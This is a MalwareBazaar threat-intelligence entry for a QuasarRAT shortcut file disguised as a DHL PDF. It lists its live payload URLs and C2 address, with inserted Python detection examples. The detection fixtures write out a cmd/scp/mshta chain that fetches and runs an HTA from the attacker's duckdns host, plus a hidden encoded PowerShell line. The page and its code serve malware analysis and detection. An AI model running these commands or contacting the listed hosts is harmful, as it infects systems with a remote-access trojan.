MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 f152336d161c279526b7909693c8f3fe8775f5c037cf471a41bb22ae0c4b2f85. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



QuasarRAT


Vendor detections: 10



SHA256 hash: f152336d161c279526b7909693c8f3fe8775f5c037cf471a41bb22ae0c4b2f85
SHA3-384 hash: 2137e9b427b64de97aad3d72e929aab2394b15ec9ea0c55e53d513267c157dc2e9349e9aaf317b44e5199638a583a2f6
SHA1 hash: ac127631e6b9ae0d116b6ada0c1257a7616ca5ea
MD5 hash: a19a7ae54479ea7636738f50f79b2daa
humanhash: finch-september-illinois-nine
File name: Delivery.pdf.lnk
Signature: QuasarRAT
File size: 2'644 bytes
First seen: 2023-10-12 12:47:16 UTC
Last seen: Never
File type: Shortcut (lnk)
MIME type: application/octet-stream
ssdeep: 24:8AGJ/ByUl1+f1fBiFnNht1Wdd79ds5FW1:8xifgFnT/WdJ9wW
TLSH: T1D4513D141AE90710F3B75E76567A63208D77B846DE758F0D004C53C82B67A21E875F7B
Reporter: abuse_ch
Tags: DHL lnk QuasarRAT RAT


abuse_ch
zip->lnk->scp->hta->exe

Payload delivery domain:
dhlmissed.com

Payload delivery URLs:
https://frankmullers.duckdns.org/Dhlinvoice.pdf
https://frankmullers.duckdns.org/svchost.exe
https://frankmullers.duckdns.org/stub.exe

QuasarRAT botnet C2:
185.17.0.246:1419

Intelligence


File Origin
# of uploads :
1
# of downloads :
271
Origin country :
CH
Vendor Threat Intelligence
Result
Verdict:
Malicious
File Type:
LNK File - Malicious
Behaviour
BlacklistAPI detected
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
cmd evasive lolbin masquerade mshta
Result
Verdict:
MALICIOUS
Result
Threat name:
n/a
Detection:
malicious
Classification:
troj.evad
Score:
96 / 100
Signature
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses dynamic DNS services
Uses the Telegram API (likely for C&C communication)
Very long command line found
Windows shortcut file (LNK) starts blacklisted processes
Behaviour
Behavior Graph:
Behavior Graph ID: 1324677
Sample: Delivery.pdf.lnk
Start date: 12/10/2023
Architecture: WINDOWS
Score: 96

Process tree (as drawn in the graph):
cmd.exe
    mshta.exe
        powershell.exe
            Acrobat.exe
                AcroCEF.exe
                    AcroCEF.exe
            conhost.exe
    scp.exe
        ssh.exe
    conhost.exe
SkypeApp.exe

Network (as drawn in the graph):
powershell.exe -> frankmullers.duckdns.org (193.42.33.145, TCP 443; EENET-ASEE, Germany), source ports 49702, 49709
ssh.exe -> hta4lyfeohyea.duckdns.org (185.196.8.30, TCP 22; SIMPLECARRER2IT, Switzerland), source port 49701
3 other IPs or domains

Signatures attached to the graph:
Malicious sample detected (through community Yara rule)
Antivirus detection for URL or domain
Antivirus / Scanner detection for submitted sample
5 other signatures
Windows shortcut file (LNK) starts blacklisted processes (on mshta.exe)
Suspicious powershell command line found (on mshta.exe)
Very long command line found (on mshta.exe)
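The process tree in the behaviour graph above (cmd.exe launched from the shortcut, spawning mshta.exe with a long PowerShell command line and scp.exe/ssh.exe to a duckdns.org host on port 22) is the shape a process-creation detection can key on. The Python below is an added example, not code from MalwareBazaar or the sandbox vendor: it runs three rules over constructed Sysmon Event ID 1-style events that mirror the reported tree. The pids, image paths and command lines are hypothetical; only the dynamic-DNS hostname comes from this report.

```python
"""Process-chain detection for the LNK -> cmd.exe -> {mshta.exe, scp.exe} tree.

Added example; not code from MalwareBazaar or the sandbox vendor. Events are
constructed (hypothetical pids, paths and command lines) to mirror the
behaviour graph; only the duckdns.org hostname comes from the report.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:            # subset of Sysmon Event ID 1 fields
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events (not a real log).
EVENTS = [
    Event(1000, 900, "C:\\Windows\\explorer.exe", "explorer.exe"),
    # the LNK's target: cmd.exe launched by explorer.exe on double-click
    Event(2100, 1000, "C:\\Windows\\System32\\cmd.exe",
          "cmd.exe /c scp -o StrictHostKeyChecking=no user@hta4lyfeohyea.duckdns.org:payload.hta %TEMP%\\ "
          "&& mshta %TEMP%\\payload.hta"),
    Event(2200, 2100, "C:\\Windows\\System32\\OpenSSH\\scp.exe",
          "scp -o StrictHostKeyChecking=no user@hta4lyfeohyea.duckdns.org:payload.hta C:\\Users\\u\\AppData\\Local\\Temp\\"),
    Event(2300, 2200, "C:\\Windows\\System32\\OpenSSH\\ssh.exe",
          "ssh -x -oStrictHostKeyChecking=no -l user -- hta4lyfeohyea.duckdns.org scp -f payload.hta"),
    Event(2400, 2100, "C:\\Windows\\System32\\mshta.exe",
          "mshta C:\\Users\\u\\AppData\\Local\\Temp\\payload.hta"),
    Event(2500, 2400, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
          "powershell.exe -nop -w hidden -ep bypass -enc " + "A" * 600),
    # benign control: an interactive shell and a normal child
    Event(3100, 1000, "C:\\Windows\\System32\\cmd.exe", "cmd.exe"),
    Event(3200, 3100, "C:\\Windows\\System32\\ipconfig.exe", "ipconfig /all"),
]

LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
REMOTE_COPY = {"scp.exe", "ssh.exe", "sftp.exe", "curl.exe"}
DYN_DNS = re.compile(r"[\w.-]+\.(?:duckdns\.org|no-ip\.com|ddns\.net|hopto\.org)\b", re.I)
LONG_CMDLINE = 512   # this example's threshold for "very long command line"


def basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid, pid):
    """Image basenames from the process up to the root, child first."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def detect(events):
    """Return (rule, pid, detail) findings over a batch of process-creation events."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        chain = ancestry(by_pid, e.pid)
        # Rule 1: explorer.exe -> cmd.exe -> LOLBin/remote-copy tool, the shape a
        # double-clicked LNK produces ("LNK starts blacklisted processes").
        if name in LOLBINS | REMOTE_COPY and chain[1:3] == ["cmd.exe", "explorer.exe"]:
            findings.append(("explorer>cmd>lolbin", e.pid, " <- ".join(chain)))
        # Rule 2: very long command line on a script host ("Very long command line found").
        if name in {"mshta.exe", "powershell.exe", "pwsh.exe"} and len(e.cmdline) > LONG_CMDLINE:
            findings.append(("long_cmdline", e.pid, f"{len(e.cmdline)} chars"))
        # Rule 3: dynamic-DNS host handed to a shell, script host or copy tool
        # ("Uses dynamic DNS services").
        m = DYN_DNS.search(e.cmdline)
        if m and name in LOLBINS | REMOTE_COPY | {"cmd.exe"}:
            findings.append(("dyndns_host", e.pid, m.group(0)))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(f"{rule:22} pid={pid:<5} {detail}")
```

Rule 1 deliberately looks only one hop up: the shortcut's own cmd.exe is what explorer.exe spawns, so ssh.exe (grandchild of cmd.exe via scp.exe) is caught by the dynamic-DNS rule rather than the chain rule, and the interactive cmd.exe with an ipconfig child produces nothing.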
Threat name:
Shortcut.Trojan.Hidden
Status:
Malicious
First seen:
2023-10-12 12:47:35 UTC
File Type:
Binary
AV detection:
9 of 37 (24.32%)
Threat level:
  5/5
Result
Malware family:
Score:
  10/10
Tags:
family:quasar botnet:cashing persistence spyware stealer trojan
Behaviour
Checks processor information in registry
Creates scheduled task(s)
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Enumerates physical storage devices
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Checks computer location settings
Executes dropped EXE
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Blocklisted process makes network request
Downloads MZ/PE file
Quasar RAT
Quasar payload
Malware Config
C2 Extraction:
185.17.0.246:1419
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Execution_in_LNK
Author: @bartblaze
Description: Identifies execution artefacts in shortcut (LNK) files.
Rule name: EXE_in_LNK
Author: @bartblaze
Description: Identifies executable artefacts in shortcut (LNK) files.
Rule name: Long_RelativePath_LNK
Author: @bartblaze
Description: Identifies shortcut (LNK) file with a long relative path. Might be used in an attempt to hide the path.
Rule name: Script_in_LNK
Author: @bartblaze
Description: Identifies scripting artefacts in shortcut (LNK) files.
Rule name: SUSP_LNK_CMD
Author: SECUINFRA Falcon Team
Description: Detects the reference to cmd.exe inside an lnk file, which is suspicious
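The five YARA rules above key on strings stored in the shortcut's StringData (relative path, arguments, icon location), and the sandbox's "double extension" and "starts blacklisted processes" signatures key on the file name and on what that StringData launches. The Python below is an added example, not MalwareBazaar's, @bartblaze's or SECUINFRA's rule code: a minimal MS-SHLLINK parser plus a triage pass whose hit names echo those rules. The sample shortcut is constructed in memory; its relative path, arguments, icon location and the name "payload.hta" are hypothetical placeholders modelled on the zip->lnk->scp->hta->exe chain reported for this sample, and the long-path threshold is this example's own choice, not the published rule's.

```python
"""Static triage of a Windows shortcut (.lnk) along the lines of the YARA rules above.

Added example; not MalwareBazaar's, @bartblaze's or SECUINFRA's rule code.
Follows the MS-SHLLINK layout: 76-byte ShellLinkHeader, optional
LinkTargetIDList and LinkInfo, then StringData. The sample shortcut is built
in memory; its path, arguments, icon and "payload.hta" are hypothetical.
"""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7             # ShowCommand values
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location")]   # StringData order


def parse_lnk(data):
    """Return link flags, ShowCommand and whatever StringData strings are present."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link: bad HeaderSize or LinkCLSID")
    flags, = struct.unpack_from("<I", data, 20)
    show_cmd, = struct.unpack_from("<I", data, 60)
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    info = {"link_flags": flags, "show_command": show_cmd}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count, = struct.unpack_from("<H", data, off)  # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            info[key] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            info[key] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return info


EXEC_RE = re.compile(r"\b(cmd|mshta|powershell|pwsh|wscript|cscript|rundll32|regsvr32|"
                     r"certutil|bitsadmin|scp|ssh|curl)(?:\.exe)?\b", re.I)
SCRIPT_HOSTS = {"mshta", "wscript", "cscript", "powershell", "pwsh"}
SCRIPT_EXT_RE = re.compile(r"\.(?:hta|vbs|js|ps1|bat|wsf)\b", re.I)
REMOTE_RE = re.compile(r"https?://\S+|\b[\w.-]+@[\w.-]+\.\w+", re.I)
DOUBLE_EXT_RE = re.compile(r"\.(?:pdf|doc|docx|xls|xlsx|jpg|png|txt)\.lnk$", re.I)
LONG_PATH = 50   # this example's own threshold, not the published rule's


def triage_lnk(data, filename=""):
    """Parse and return (info, hits); hit names echo the YARA rules listed on the page."""
    info = parse_lnk(data)
    cmd = (info.get("relative_path", "") + " " + info.get("arguments", "")).strip()
    hits = {}
    exes = sorted({m.group(1).lower() for m in EXEC_RE.finditer(cmd)})
    if exes:
        hits["Execution_in_LNK"] = exes
    if "cmd" in exes:
        hits["SUSP_LNK_CMD"] = info.get("relative_path", "")
    if SCRIPT_EXT_RE.search(cmd) or set(exes) & SCRIPT_HOSTS:
        hits["Script_in_LNK"] = info.get("arguments", "")
    if len(info.get("relative_path", "")) > LONG_PATH:
        hits["Long_RelativePath_LNK"] = len(info["relative_path"])
    if info["show_command"] == SW_SHOWMINNOACTIVE:   # console window never shown to the user
        hits["hidden_window"] = "ShowCommand=SW_SHOWMINNOACTIVE"
    m = REMOTE_RE.search(cmd)
    if m:
        hits["remote_host"] = m.group(0)
    if DOUBLE_EXT_RE.search(filename):              # e.g. Delivery.pdf.lnk
        hits["double_extension"] = filename
    return info, hits


def build_lnk(relative_path, arguments, icon_location, show_command=SW_SHOWMINNOACTIVE):
    """Minimal Unicode .lnk: header + RELATIVE_PATH, COMMAND_LINE_ARGUMENTS, ICON_LOCATION."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0, 0, 0, 0, 0, 0,
                         show_command, 0, 0, 0, 0)

    def sd(s):   # StringData entry: CountCharacters + UTF-16LE characters
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + sd(relative_path) + sd(arguments) + sd(icon_location)


# Constructed sample modelled on the reported chain (hypothetical path/args/icon).
SAMPLE_LNK = build_lnk(
    "..\\" * 12 + "Windows\\System32\\cmd.exe",
    "/c scp -o StrictHostKeyChecking=no user@hta4lyfeohyea.duckdns.org:payload.hta %TEMP%\\ "
    "&& mshta %TEMP%\\payload.hta",
    "%ProgramFiles%\\Adobe\\Acrobat DC\\Acrobat\\Acrobat.exe",
)
BENIGN_LNK = build_lnk("..\\Notepad++\\notepad++.exe", "", "", show_command=SW_SHOWNORMAL)

if __name__ == "__main__":
    for name, blob in (("Delivery.pdf.lnk", SAMPLE_LNK), ("Notepad++.lnk", BENIGN_LNK)):
        info, hits = triage_lnk(blob, name)
        print(name, "->", info.get("relative_path"), info.get("arguments"), hits)
```

On a real sample, pass the file bytes and its name to triage_lnk; the parser walks the optional IDList and LinkInfo blocks so the StringData offsets are right, and the hit names line up with the rule matches shown on this page.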

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download
Signature: QuasarRAT
File type: Shortcut (lnk)
SHA256 hash: f152336d161c279526b7909693c8f3fe8775f5c037cf471a41bb22ae0c4b2f85 (this sample)

Comments